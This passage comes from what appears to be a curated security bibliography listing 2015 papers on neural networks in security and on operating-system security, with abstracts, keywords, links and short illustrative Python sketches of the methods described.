Vukovic, M.; Skocir, P.; Katusic, D.; Jevtic, D.; Trutin, D.; Delonga, L., "Estimating real world privacy risk scenarios," in Telecommunications (ConTEL), 2015 13th International Conference on, pp. 1-7, 13-15 July 2015. doi: 10.1109/ConTEL.2015.7231214

Abstract: User privacy is becoming an issue on the Internet due to common data breaches and various security threats. Services tend to require private user data in order to provide more personalized content, and users are typically unaware of the potential risks to their privacy. This paper continues our work on the proposed user privacy risk calculator based on a feedforward neural network. Along with the risk estimate, we provide users with real-world example scenarios that depict privacy threats according to the selected input parameters. In this paper, we present a model for selecting the most probable real-world scenario, presented as a comic, thus avoiding overwhelming the user with information that he or she may find confusing. The most probable scenario is estimated by an artificial neural network trained with real-world scenarios and probabilities estimated from real-world occurrences. Additionally, we group real-world scenarios into categories that are presented to the user as further reading on privacy risks.

keywords: data privacy;feedforward neural nets;learning (artificial intelligence);probability;artificial neural network training;data breach;feed-forward neural network;input parameter selection;personalized content;privacy risks;privacy threats;private user data;probabilities;real-world privacy risk scenario estimation;risk estimation;security threats;user privacy;user privacy risk calculator;Calculators;Electronic mail;Estimation;Internet;Law;Privacy (ID#: 16-9259)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7231214&isnumber=7231179
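
Once a trained network has scored the candidate scenarios, selecting the most probable one reduces to a softmax over the scores followed by an argmax. The Python sketch below illustrates just that selection step; the scenario names, weight matrix, and feature values are hypothetical stand-ins for the network described above.

```python
import numpy as np

def pick_scenario(features, weights, names):
    """Score each real-world scenario and return the most probable one."""
    scores = weights @ features                 # weights stand in for a trained output layer
    probs = np.exp(scores - scores.max())       # numerically stable softmax
    probs /= probs.sum()
    return names[int(np.argmax(probs))]

if __name__ == "__main__":
    names = ["identity theft", "location tracking", "profiling"]
    weights = np.array([[0.9, 0.1, 0.2], [0.2, 0.8, 0.1], [0.3, 0.4, 0.7]])
    features = np.array([1.0, 0.2, 0.5])        # hypothetical risk-calculator inputs
    print(pick_scenario(features, weights, names))  # identity theft
```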

 

Cuiling Jiang; Yilin Pang; Anwen Wu, "A Novel Robust Image-Hashing Method for Content Authentication," in Security and Privacy in Social Networks and Big Data (SocialSec), 2015 International Symposium on, pp. 22-27, 16-18 Nov. 2015. doi: 10.1109/SocialSec2015.15

Abstract: Image hash functions find extensive application in content authentication, database search, and digital forensics. This paper develops a novel robust image-hashing method based on a genetic algorithm (GA) and a Back Propagation (BP) neural network for content authentication. A lifting wavelet transform is used to extract the image's low-frequency coefficients and create the image feature matrix. A GA-BP network model is constructed to generate the image-hashing code. Experimental results demonstrate that the proposed hashing method is robust against random attacks, JPEG compression, additive Gaussian noise, and so on. Receiver operating characteristic (ROC) analysis over a large image database reveals that the proposed method significantly outperforms other approaches to robust image hashing.

keywords: Gaussian noise;authorisation;backpropagation;cryptography;data compression;genetic algorithms;image coding;neural nets;sensitivity analysis;wavelet transforms;GA-BP network model;JPEG compression;ROC;additive Gaussian noise;back propagation neural network;content authentication;database search;digital forensic;genetic algorithm;image database;image feature matrix;image hash functions;image low frequency coefficients extract;image-hashing code;lifting wavelet transform;receiver operating characteristics analysis;robust image-hashing method;Authentication;Feature extraction;Genetic algorithms;Robustness;Training;Wavelet transforms;BP network;discrimination;genetic algorithm;image hash (ID#: 16-9260)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371895&isnumber=7371823
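
The pipeline above builds a hash from low-frequency wavelet coefficients. A minimal Python sketch of the same idea, using PyWavelets and a median threshold in place of the paper's GA-optimized BP network, is shown below; perceptual similarity then appears as a small Hamming distance between hashes.

```python
import numpy as np
import pywt  # PyWavelets

def image_hash(img, level=3):
    """Binarise the low-frequency (approximation) wavelet coefficients at their median."""
    ll = pywt.wavedec2(np.asarray(img, dtype=float), "haar", level=level)[0]
    return (ll > np.median(ll)).astype(np.uint8).ravel()

def hamming(h1, h2):
    return int(np.count_nonzero(h1 != h2))

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    img = rng.random((64, 64))                       # stand-in for a real image
    noisy = img + rng.normal(0, 0.01, img.shape)     # mild additive noise
    print(hamming(image_hash(img), image_hash(noisy)))  # small distance: robust hash
```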

 

Damasceno, M.; Canuto, A.M.P.; Poh, N., "Multi-privacy biometric protection scheme using ensemble systems," in Neural Networks (IJCNN), 2015 International Joint Conference on, pp. 1-8, 12-17 July 2015. doi: 10.1109/IJCNN.2015.7280657

Abstract: Biometric systems use personal biological or behavioural traits that can uniquely characterise an individual, but this uniqueness also becomes a potential weakness when the template characterising a biometric trait is stolen or compromised. To address this, we consider two strategies for improving biometric template protection and performance, namely, (1) using multiple privacy schemes and (2) using multiple matching algorithms. While multiple privacy schemes can improve the security of a biometric system by protecting its template, using multiple matching algorithms or, similarly, multiple biometric traits along with their respective matching algorithms can improve system performance due to reduced intra-class variability. These two strategies lead to a novel ensemble system derived from multiple privacy schemes. Our findings suggest that, under the worst-case scenario evaluation where the key or keys protecting the template are stolen, the multi-privacy protection scheme can outperform a single protection scheme as well as the baseline biometric system without template protection.

keywords: biometrics (access control);data privacy;behavioural traits;biological traits;biometric template protection;ensemble systems;multiple matching algorithms;multiprivacy biometric protection;worst-case scenario evaluation;Biology;Training (ID#: 16-9261)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7280657&isnumber=7280295
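
A simple way to combine an ensemble of matchers, in the spirit of the scheme above, is weighted-sum score fusion against an acceptance threshold. The Python sketch below is a generic illustration; the matcher scores, weights, and threshold are hypothetical, and the paper's protection and fusion schemes are considerably more involved.

```python
import numpy as np

def fuse_and_decide(match_scores, weights, threshold):
    """Accept a claimant when the weighted sum of matcher scores clears the threshold."""
    return float(match_scores @ weights) >= threshold

if __name__ == "__main__":
    # Hypothetical normalised scores from three privacy-protected matchers.
    genuine_attempt  = np.array([0.82, 0.74, 0.91])
    impostor_attempt = np.array([0.35, 0.61, 0.28])
    w = np.array([0.4, 0.2, 0.4])                    # per-matcher reliability weights
    print(fuse_and_decide(genuine_attempt, w, threshold=0.7))   # True  (accept)
    print(fuse_and_decide(impostor_attempt, w, threshold=0.7))  # False (reject)
```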

 

Boyang Li; Chen Liu, "Parallel BP Neural Network on Single-chip Cloud Computer," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1871-1875, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.280

Abstract: Neural networks have been a clear focus in the machine learning area. The back propagation (BP) method is frequently used in neural network training. In this work we parallelized a BP neural network on the Single-Chip Cloud Computer (SCC), an experimental processor created by Intel Labs, and analyzed multiple metrics under different configurations. We also varied the number of neurons (nodes) in the hidden layer of the BP neural network and studied the impact. The experimental results show that better performance can be obtained with the SCC, especially when there are more nodes in the hidden layer of the BP neural network. A low voltage and frequency configuration contributes to low power per unit of speedup, while a medium voltage and frequency configuration contributes to both low energy consumption and a low energy-delay product.

keywords: backpropagation;cloud computing;learning (artificial intelligence);Intel Labs;SCC;back propagation method;machine learning;parallel BP neural network;single-chip cloud computer;Biological neural networks;Computers;Energy consumption;Frequency-domain analysis;Power demand;Training;Back Propagation;Energy-Aware Computing;Neural Network;Power-Aware Computing;Single-chip Cloud Computer (ID#: 16-9262)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336445&isnumber=7336120
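
The core pattern in data-parallel BP training is that each core computes a gradient on its own shard and the results are averaged into one synchronous weight update. The Python sketch below shows that pattern with a single-layer logistic model standing in for the BP network and a plain loop standing in for the SCC's cores; it is a conceptual sketch, not the authors' SCC code.

```python
import numpy as np

def shard_gradient(w, X, y):
    """Logistic-loss gradient on one shard; each core would compute one of these."""
    p = 1.0 / (1.0 + np.exp(-X @ w))
    return X.T @ (p - y) / len(y)

def parallel_step(w, shards, lr=0.5):
    """Average per-shard gradients and apply one synchronous update."""
    grads = [shard_gradient(w, X, y) for X, y in shards]
    return w - lr * np.mean(grads, axis=0)

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    X = rng.normal(size=(400, 3))
    y = (X @ np.array([1.0, -2.0, 0.5]) > 0).astype(float)
    shards = [(X[i::4], y[i::4]) for i in range(4)]   # four "cores"
    w = np.zeros(3)
    for _ in range(200):
        w = parallel_step(w, shards)
    print(np.round(w, 2))   # grows along the separating direction [1, -2, 0.5]
```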

 

Manem, H.; Beckmann, K.; Min Xu; Carroll, R.; Geer, R.; Cady, N.C., "An extendable multi-purpose 3D neuromorphic fabric using nanoscale memristors," in Computational Intelligence for Security and Defense Applications (CISDA), 2015 IEEE Symposium on, pp. 1-8, 26-28 May 2015. doi: 10.1109/CISDA.2015.7208625

Abstract: Neuromorphic computing offers an attractive means of processing and learning complex real-world data. With the emergence of the memristor, the physical realization of cost-effective artificial neural networks is becoming viable, owing to reduced area and improved performance relative to strictly CMOS implementations. In the work presented here, memristors are utilized as synapses in the realization of a multi-purpose heterogeneous 3D neuromorphic fabric. This paper details our in-house memristor and 3D technologies in the design of a fabric that can perform real-world signal processing (i.e., image/video, etc.) as well as everyday Boolean logic applications. The applicability of this fabric is therefore diverse, with applications ranging from general-purpose and high-performance logic computing to power-conservative image detection for mobile and defense applications. The proposed system is an area-effective heterogeneous 3D integration of memristive neural networks that consumes significantly less power and allows for high speeds (3D ultra-high-bandwidth connectivity) in comparison to a purely CMOS 2D implementation. The images and results provided illustrate our state-of-the-art 3D and memristor technology capabilities for the realization of the proposed 3D memristive neural fabric. Simulation results also show the mapping of Boolean logic functions and images onto perceptron-based neural networks. The results demonstrate the proof of concept of this system, which is the first step in the physical realization of the multi-purpose heterogeneous 3D memristive neuromorphic fabric.

keywords: Boolean functions;CMOS integrated circuits;fabrics;memristors;neural chips;perceptrons;signal processing;three-dimensional integrated circuits;3D memristive neural fabric;3D technology;Boolean logic function application;CMOS implementation;area effective heterogeneous 3D integration;artificial neural network;complementary metal oxide semiconductor;defense application;extendable multipurpose 3D neuromorphic fabric;logic computing;memristive neural network;mobile application;nanoscale memristor;neuromorphic computing;perceptron;power conservative image detection;signal processing;Decision support systems;Fabrics;Memristors;Metals;Neuromorphics;Neurons;Three-dimensional displays;3D integrated circuits;Neuromorphics;image processing;memristor;nanoelectronics;neural networks (ID#: 16-9263)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208625&isnumber=7208613
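
Mapping Boolean logic onto perceptrons, as in the simulations above, amounts to choosing weights and a firing threshold. The Python sketch below realizes AND and OR with a single threshold neuron; in the fabric described above, a memristor crossbar would compute the same weighted sum in analog hardware, with conductances playing the role of the weights.

```python
import numpy as np

def perceptron(weights, bias, inputs):
    """Threshold neuron: fires when the weighted input sum exceeds the bias."""
    return int(np.dot(weights, inputs) + bias > 0)

AND_W, AND_B = np.array([1.0, 1.0]), -1.5   # fires only when both inputs are 1
OR_W,  OR_B  = np.array([1.0, 1.0]), -0.5   # fires when at least one input is 1

if __name__ == "__main__":
    for a in (0, 1):
        for b in (0, 1):
            x = np.array([a, b])
            print(a, b, "AND:", perceptron(AND_W, AND_B, x),
                  "OR:", perceptron(OR_W, OR_B, x))
```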

 

Tankasala, S.P.; Doynov, P., "Multi scale multi directional shear operator for personal recognition using Conjunctival vasculature," in Technologies for Homeland Security (HST), 2015 IEEE International Symposium on, pp. 1-6, 14-16 April 2015. doi: 10.1109/THS.2015.7225292

Abstract: In this paper, we present the results of a study on the utilization of the conjunctival vasculature pattern as a biometric modality for personal identification. The visible red blood vessel patterns on the sclera of the eye are gaining acceptance as a biometric modality due to their proven uniqueness and easy accessibility for imaging in the visible spectrum. After acquisition, the images of conjunctival vascular patterns are enhanced using the difference of Gaussians (DoG). Feature extraction is performed using a multi-scale, multi-directional shear operator (the shearlet transform). Linear discriminant analysis (LDA), neural networks (NN), and pairwise distance metrics were used for classification. In the study, images of 50 subjects were acquired with a DSLR camera at different gazes and multiple distances (the CIBIT-I dataset). Additionally, the performance of the proposed algorithms was tested using different gaze images acquired from 35 subjects using an iPhone (the CIBIT-II dataset). ROC AUC analysis was used to test the classification performance. Areas under the curve (AUC) and equal error rates (EER) are reported for all acquisition scenarios and processing algorithms. The best EER value of 0.29% was obtained for the CIBIT-I dataset using NN, and a 2.44% EER value for the CIBIT-II dataset using LDA.

keywords: Gaussian processes;biometrics (access control);blood vessels;error statistics;eye;feature extraction;image classification;image segmentation;neural nets;transforms;CIBIT-I dataset;CIBIT-II dataset;DSLR camera;DoG;EER value;LDA;ROC AUC analysis;Shearlet transform;areas under the curve;biometric modality;classification performance;conjunctival vasculature pattern;difference of Gaussian;equal error rate;eye;feature extraction;gaze images;iPhone;image classification;linear discriminant analysis;multiscale multidirectional shear operator;neural network;pairwise distance metric;personal identification;personal recognition;red blood vessel pattern;sclera;visible spectrum;Artificial neural networks;Cameras;Feature extraction;Image segmentation;Measurement;Transforms;Biometrics;Conjunctival vasculature;Difference of Gaussian;Linear discriminant analysis;Neural Networks;Ocular biometrics;Shearlet transforms (ID#: 16-9264)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7225292&isnumber=7190491
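
The difference-of-Gaussians enhancement step used above is straightforward to reproduce: subtract a wide Gaussian blur from a narrow one, which passes mid-frequency structure such as vessels. The SciPy sketch below runs on a random stand-in image; the paper's shearlet feature extraction and classification stages are omitted.

```python
import numpy as np
from scipy.ndimage import gaussian_filter

def difference_of_gaussians(img, sigma_narrow=1.0, sigma_wide=2.0):
    """Band-pass enhancement: narrow blur minus wide blur keeps vessel-scale detail."""
    return gaussian_filter(img, sigma_narrow) - gaussian_filter(img, sigma_wide)

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    img = rng.random((128, 128))                 # stand-in for a sclera image
    enhanced = difference_of_gaussians(img)
    print(enhanced.shape, round(float(enhanced.mean()), 4))  # roughly zero-mean output
```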

 

Adenusi, D.; Kuboye, B.M.; Alese, B.K.; Thompson, A.F.-B., "Development of cyber situation awareness model," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-11, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166135

Abstract: This study designed and simulated a cyber situation awareness model for gaining experience of the cyberspace condition, with a view to detecting anomalous activities in a timely manner and taking proactive decisions to safeguard cyberspace. The situation awareness model was built using Artificial Intelligence (AI) techniques. The cyber situation perception sub-model was modelled using Artificial Neural Networks (ANN), while the comprehension and projection sub-models were modelled using Rule-Based Reasoning (RBR) techniques. The cyber situation perception sub-model was simulated in MATLAB 7.0 using the standard KDD'99 intrusion dataset and evaluated for threat detection accuracy using precision, recall, and overall accuracy metrics. The simulation results for these performance metrics showed that the perception sub-model performed better as the number of training data records increased. The cyber situation model met its overall goal of assisting network administrators in gaining experience of the cyberspace condition: it was capable of sensing the cyberspace condition, performing analysis based on the sensed condition, and predicting the near-future condition of the cyberspace.

keywords: artificial intelligence;inference mechanisms;knowledge based systems;mathematics computing;neural nets;security of data;AI technique;ANN;Matlab 7.0;RBR techniques;anomalous activities detection;artificial intelligence;artificial neural networks;cyber situation awareness model;cyberspace condition;proactive decision safeguard;rule-based reasoning;training data records;Artificial neural networks;Computational modeling;Computer security;Cyberspace;Data models;Intrusion detection;Mathematical model;Artificial Intelligence;Awareness;cyber-situation;cybersecurity;cyberspace (ID#: 16-9265)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166135&isnumber=7166109
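
The evaluation metrics named above are standard; for reference, the short Python sketch below computes precision, recall, and overall accuracy from binary intrusion labels. The example labels are invented, not drawn from KDD'99.

```python
def detection_metrics(y_true, y_pred):
    """Precision, recall, and overall accuracy for binary intrusion labels (1 = attack)."""
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    tn = len(y_true) - tp - fp - fn
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    accuracy = (tp + tn) / len(y_true)
    return precision, recall, accuracy

if __name__ == "__main__":
    truth     = [1, 1, 0, 0, 1, 0, 1, 0]
    predicted = [1, 0, 0, 1, 1, 0, 1, 0]
    print(detection_metrics(truth, predicted))  # (0.75, 0.75, 0.75)
```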

 

Seemakurthi, P.; Shuhao Zhang; Yibing Qi, "Detection of fraudulent financial reports with machine learning techniques," in Systems and Information Engineering Design Symposium (SIEDS), 2015, pp. 358-361, 24-24 April 2015. doi: 10.1109/SIEDS.2015.7117005

Abstract: This paper describes our efforts to apply various advanced supervised machine learning and natural language processing techniques, including Binomial Logistic Regression, Support Vector Machines, Neural Networks, Ensemble Techniques, and Latent Dirichlet Allocation (LDA), to the problem of detecting fraud in financial reporting documents available from the United States Securities and Exchange Commission EDGAR database. Specifically, we apply LDA to a collection of type 10-K financial reports to generate a document-topic frequency matrix, and then submit these data to a series of advanced classification algorithms. We then apply evaluation metrics, such as precision, the Receiver Operating Characteristic curve, and the Area Under the Curve, to evaluate the performance of each algorithm. We conclude that these methods show promise and suggest applying the approach to a larger set of input documents.

keywords: document handling;financial data processing;fraud;learning (artificial intelligence);matrix algebra;natural language processing;neural nets;pattern classification;regression analysis;security of data;support vector machines;EDGAR database;LDA;Security and Exchange Commission;United States;area under the curve;binomial logistic regression;classification algorithms;document-topic frequency matrix;ensemble techniques;evaluation metrics;financial reporting documents;fraudulent financial reports detection;latent Dirichlet allocation;natural language processing techniques;neural networks;precision;receiver operating characteristic curve;supervised machine learning techniques;support vector machines;Accuracy;Classification algorithms;Correlation;Logistics;Natural language processing;Neural networks;Support vector machines;Ensemble;Financial Fraud Detection;Latent Dirichlet Allocation;Machine Learning;Natural Language Processing;Support Vector Machines (ID#: 16-9266)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7117005&isnumber=7116953
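
The pipeline above, LDA topics feeding a classifier scored by ROC AUC, can be sketched in a few lines of scikit-learn. The toy corpus and labels below are invented stand-ins for EDGAR 10-K filings, and the model is scored on its own training data purely to keep the sketch short.

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score

# Toy stand-ins for 10-K filings; real inputs would come from the EDGAR database.
docs = ["revenue growth strong cash flow audit clean",
        "restated earnings irregular transactions undisclosed liabilities",
        "steady dividends audited statements compliance controls",
        "off balance sheet entities inflated revenue restated"]
labels = [0, 1, 0, 1]                       # 1 = fraudulent report

counts = CountVectorizer().fit_transform(docs)
topics = LatentDirichletAllocation(n_components=2, random_state=0).fit_transform(counts)

clf = LogisticRegression().fit(topics, labels)   # document-topic matrix -> classifier
print(roc_auc_score(labels, clf.predict_proba(topics)[:, 1]))
```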

 

Khalifa, A.A.; Hassan, M.A.; Khalid, T.A.; Hamdoun, H., "Comparison between mixed binary classification and voting technique for active user authentication using mouse dynamics," in Computing, Control, Networking, Electronics and Embedded Systems Engineering (ICCNEEE), 2015 International Conference on, pp. 281-286, 7-9 Sept. 2015. doi: 10.1109/ICCNEEE.2015.7381378

Abstract: The rapid proliferation of computing processing power has facilitated a rise in the adoption of computers in various aspects of human lives, from education, shopping, and other everyday activities to critical applications in finance, banking, and, recently, degree-awarding online education. Several approaches to user authentication based on Behavioral Biometrics (BB) have been suggested in order to identify a unique signature/footprint, improving matching accuracy for genuine users and flagging abnormal behaviors from intruders. In this paper we present a comparison between two classification algorithms for identifying users' behavior using mouse dynamics. The algorithms are based on a support vector machine (SVM) classifier, allowing for direct comparison between different authentication-based metrics. The voting technique shows a low False Acceptance Rate (FAR) and a noticeably small learning time, making it more suitable for incorporation within different authentication applications.

keywords: behavioural sciences computing;government data processing;learning (artificial intelligence);mouse controllers (computers);pattern classification;security of data;support vector machines;FAR;SVM;active user authentication;behavioral biometrics;false acceptance rate;learning time;mixed binary classification;mouse dynamics;support vector machine;voting technique;Artificial neural networks;Biometrics (access control);active authentication;machine learning;mouse dynamics;pattern recognition;support vector machines (ID#: 16-9267)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381378&isnumber=7381351
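
The voting technique can be pictured as classifying each segment of a session with the trained SVM and taking a majority vote over the per-segment decisions. The scikit-learn sketch below builds this on synthetic two-feature "mouse dynamics" data; the features and their distributions are hypothetical.

```python
import numpy as np
from collections import Counter
from sklearn.svm import SVC

rng = np.random.default_rng(0)
# Hypothetical per-segment features (mean speed, click interval) for two users.
genuine  = rng.normal([1.0, 0.3], 0.1, size=(50, 2))
intruder = rng.normal([1.6, 0.6], 0.1, size=(50, 2))
X = np.vstack([genuine, intruder])
y = np.array([1] * 50 + [0] * 50)           # 1 = genuine user, 0 = intruder

clf = SVC().fit(X, y)

# Voting: classify each segment of a fresh session, then take the majority label.
session = rng.normal([1.0, 0.3], 0.1, size=(9, 2))   # genuine user's new segments
votes = clf.predict(session)
print(int(Counter(votes).most_common(1)[0][0]))      # 1 -> session accepted as genuine
```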

 

Parker, G.G.; Weaver, W.W.; Robinett, R.D.; Wilson, D.G., "Optimal DC microgrid power apportionment and closed loop storage control to mitigate source and load transients," in Resilience Week (RWS), 2015, pp. 1-7, 18-20 Aug. 2015. doi: 10.1109/RWEEK.2015.7287420

Abstract: This paper considers the optimal management of an N-source DC microgrid with time-varying sources and loads. Optimality is defined as minimizing the amount of power lost through the boost converters that connect the N sources to the DC bus. The optimal power apportionment strategy is part of an overall grid management system that also includes control laws that manage bus voltage and boost currents using distributed energy storage. The performance of the optimal power apportionment strategy is compared to an existing, alternate approach using a three-source simulation for both source and load step transients. The optimal power apportionment strategy is shown to use less power while maintaining bus voltage in the presence of both load and source transients. Since the optimal solution requires information exchange between all the sources, there is an opportunity for malicious attack. The ability of the strategy to maintain the desired bus voltage in the presence of an uncommunicated source failure is also presented.

keywords: closed loop systems;distributed power generation;electric current control;failure analysis;load regulation;optimal control;power control;power distribution control;power distribution faults;power system security;voltage control;bus voltage management;closed loop storage control;current boosting;distributed energy storage;load transient mitigation;malicious attack;optimal DC microgrid power apportionment;overall grid management system;power lost amount minimization;source transient mitigation;uncommunicated source failure;Computational modeling;Energy storage;Feedforward neural networks;Microgrids;Steady-state;Transient analysis;Voltage control (ID#: 16-9268)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7287420&isnumber=7287407
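
If each converter's loss is modeled as quadratic in its delivered power, r_i * p_i^2, then the loss-minimizing split of a given demand follows from the Lagrangian condition: each source carries a share proportional to 1/r_i. The NumPy sketch below verifies this closed form with hypothetical loss coefficients; the paper's full formulation additionally handles storage control and transients.

```python
import numpy as np

def apportion(load_demand, loss_coeffs):
    """Minimise sum(r_i * p_i^2) subject to sum(p_i) = demand: p_i proportional to 1/r_i."""
    inv = 1.0 / loss_coeffs
    return load_demand * inv / inv.sum()

if __name__ == "__main__":
    r = np.array([0.02, 0.05, 0.04])          # hypothetical converter loss coefficients
    p = apportion(90.0, r)                    # demand on the DC bus
    print(np.round(p, 1))                     # [47.4 18.9 23.7]: sums to 90
    print(round(float((r * p**2).sum()), 1))  # total converter loss at the optimum
```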


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Operating Systems Security 2015

 

 
SoS Logo

Operating Systems Security 2015

 

Operating system security is a component of resiliency and composability, and an area of concern for predictive metrics. The work cited here was presented in 2015.


Y. Lin; S. Malik; K. Bilal; Q. Yang; Y. Wang; S. Khan, "Designing and Modeling of Covert Channels in Operating Systems," in IEEE Transactions on Computers, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TC.2015.2458862

Abstract: Covert channels are widely considered a major risk of information leakage in various operating systems, such as desktop, cloud, and mobile systems. Existing work on modeling covert channels has mainly focused on using Finite State Machines (FSMs) and their transforms to describe the process of covert channel transmission. However, an FSM is a rather abstract model, in which information about the shared resource, synchronization, and encoding/decoding cannot be presented, making it difficult for researchers to realize and analyze covert channels. In this paper, we use High-Level Petri Nets (HLPN) to model the structural and behavioral properties of covert channels, applying the HLPN to the classic covert channel protocol. The results from the analysis of the HLPN model are used to highlight the major shortcomings and interferences in the protocol. Furthermore, we propose two new covert channel models, namely: (a) the Two-Channel Transmission Protocol (TCTP) model and (b) the Self-Adaptive Protocol (SAP) model. The TCTP model circumvents the mutual interference in encoding and synchronization operations, whereas the SAP model uses sleeping time and redundancy checks to ensure correct transmission in an environment with strong noise. To demonstrate the correctness and usability of our proposed models in heterogeneous environments, we implement the TCTP and SAP in three different systems: (a) Linux, (b) Xen, and (c) Fiasco.OC. Our implementation also indicates the practicability of the models in heterogeneous, scalable, and flexible environments.

Keywords: Analytical models; Computational modeling; Mathematical model; Operating systems; Petri nets; Protocols; Receivers; covert channels; high-level Petri nets (HLPN); modeling and security; operating systems (ID#: 16-9502)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7169547&isnumber=4358213
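
A covert timing channel of the kind modeled above encodes bits in inter-event delays, and the SAP model's redundancy check can be pictured as a parity bit verified by the receiver before accepting a block. The Python sketch below simulates such a channel with invented delay values; it illustrates the mechanism only and is not derived from the paper's HLPN models.

```python
import random

SHORT, LONG, THRESHOLD = 0.01, 0.05, 0.03   # seconds: delay encodes bit 0 or bit 1

def encode(bits):
    """Sender: append an even-parity bit (the redundancy check), map bits to delays."""
    bits = bits + [sum(bits) % 2]
    return [LONG if b else SHORT for b in bits]

def decode(delays, noise=0.005):
    """Receiver: threshold noisy delays, then verify parity before accepting the block."""
    observed = [d + random.uniform(-noise, noise) for d in delays]
    bits = [1 if d > THRESHOLD else 0 for d in observed]
    data, parity = bits[:-1], bits[-1]
    return data if sum(data) % 2 == parity else None   # None -> request retransmission

if __name__ == "__main__":
    message = [1, 0, 1, 1]
    print(decode(encode(message)))   # [1, 0, 1, 1] while noise stays below the margin
```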

 

H. Sun; F. Zhao; H. Wang; K. Wang; W. Jiang; Q. Guo; B. Zhang; L. Wehenkel, "Automatic Learning of Fine Operating Rules for Online Power System Security Control," in IEEE Transactions on Neural Networks and Learning Systems, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TNNLS.2015.2390621

Abstract: Fine operating rules for security control and an automatic system for their online discovery were developed to adapt to the development of smart grids. The automatic system uses the real-time system state to determine critical flowgates, and a continuation-power-flow-based security analysis is then used to compute the initial transfer capability of the critical flowgates. Next, the system applies Monte Carlo simulations to expected short-term operating condition changes, feature selection, and a linear least-squares fitting of the fine operating rules. The proposed system was validated both on an academic test system and on a provincial power system in China. The results indicated that the derived rules provide accuracy and good interpretability and are suitable for real-time power system security control. The use of high-performance computing systems enables these fine operating rules to be refreshed online every 15 minutes.

Keywords: Learning systems; Power system security; Power transmission lines; Real-time systems; Substations; Automatic learning; critical flowgate; knowledge discovery; online security analysis; smart grid; total transfer capability (ID#: 16-9503)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7036063&isnumber=6104215
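
The final fitting step described above is ordinary linear least squares over Monte Carlo samples. The NumPy sketch below fits such a "fine operating rule" mapping hypothetical flowgate loadings to a transfer-capability margin and recovers the planted coefficients; the data are synthetic, not from the validated test systems.

```python
import numpy as np

rng = np.random.default_rng(0)
# Hypothetical Monte Carlo samples: three loading features -> capability margin (MW).
features = rng.uniform(0.6, 1.2, size=(500, 3))
margin = features @ np.array([-120.0, -80.0, -40.0]) + 300.0 + rng.normal(0, 2, 500)

# Fit the operating rule as a linear least-squares model with an intercept term.
A = np.hstack([features, np.ones((500, 1))])
coeffs, *_ = np.linalg.lstsq(A, margin, rcond=None)
print(np.round(coeffs, 1))   # recovers roughly [-120, -80, -40, 300]
```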

 

C. W. Wang; C. W. Wang; S. W. Shieh, "ProbeBuilder: Uncovering Opaque Kernel Data Structures for Automatic Probe Construction," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2416728

Abstract: VM-based inspection tools generally implement probes in the hypervisor to monitor events and the kernel state of the guest system. The most important function of a probe is to carve information of interest out of the guest's memory when it is triggered. Implementing probes for a closed-source OS demands manually reverse-engineering the undocumented code/data structures in the kernel binary image. Furthermore, the reverse-engineering result is often not reusable between OS versions or even kernel updates due to the rapid change of these structures. In this paper, we propose ProbeBuilder, a system that automates the inference of kernel data structures. Based on dynamic execution, ProbeBuilder searches guest memory for data structures matching the "pointer-offset-pointer" pattern. The sequences of these offsets, referred to as dereferences, are then verified by ProbeBuilder against instruction evidence that traverses them. The experiment on the Windows kernel shows that ProbeBuilder efficiently narrows thousands of choices for kernel-level probes down to dozens. This finding allows analysts to quickly implement probes, facilitating the rapid development/update of inspection tools for different OSes. With these features, ProbeBuilder is the first system capable of automatically generating practical probes that extract information through dereferences of opaque kernel data structures.

Keywords: Data structures; Kernel; Monitoring; Pattern matching; Probes; Virtual machine monitors; D.2.5 [Software Engineering]: Testing and Debugging - Monitors; D.4.6 [Operating System]: Security and Privacy Protection - Invasive Software (ID#: 16-9504)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7069236&isnumber=4358699
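
The "pointer-offset-pointer" search can be pictured as scanning a memory image for addresses where both a word and the word at a fixed offset from it look like pointers back into the image. The Python sketch below runs that scan over a tiny synthetic image with one planted pointer pair; ProbeBuilder's dynamic-execution verification of the candidate dereferences is omitted.

```python
import struct

def find_pointer_chains(memory, base, offset, word=8):
    """Report addresses p where both *(p) and *(p + offset) point back into the image."""
    lo, hi = base, base + len(memory)
    hits = []
    for addr in range(base, hi - offset - word, word):
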